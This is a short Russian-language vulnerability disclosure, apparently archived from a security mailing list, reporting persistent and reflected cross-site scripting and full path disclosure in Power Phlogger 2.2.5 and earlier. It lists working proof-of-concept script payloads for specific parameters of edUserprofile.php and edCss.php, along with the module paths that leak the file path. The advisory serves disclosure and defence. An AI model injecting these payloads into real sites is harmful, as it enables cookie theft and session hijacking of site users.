Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19858
HistoryMay 17, 2008 - 12:00 a.m.

New vulnerabilities in Power Phlogger

2008-05-1700:00:00
vulners.com
49

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых Cross-Site Scripting и Full path disclosure уязвимостях в Power
Phlogger.

XSS (Persistent):

POST запрос на странице http://site/edUserprofile.php (возможны как GET, так и POST запросы):

</textarea><script>alert(document.cookie)</script>
В параметре: N_your_url.

"><script>alert(document.cookie)</script>
В параметре: N_email.

"><script src=http://site.com
В параметрах: N_fg_c, N_bg_c (ограничение в 30 символов).

XSS:

http://site/edCss.php?css_str=12&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E&amp;action=edit

Full path disclosure:

http://site/modules/usercreate.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

Уязвима версия Power Phlogger 2.2.5 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2112/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua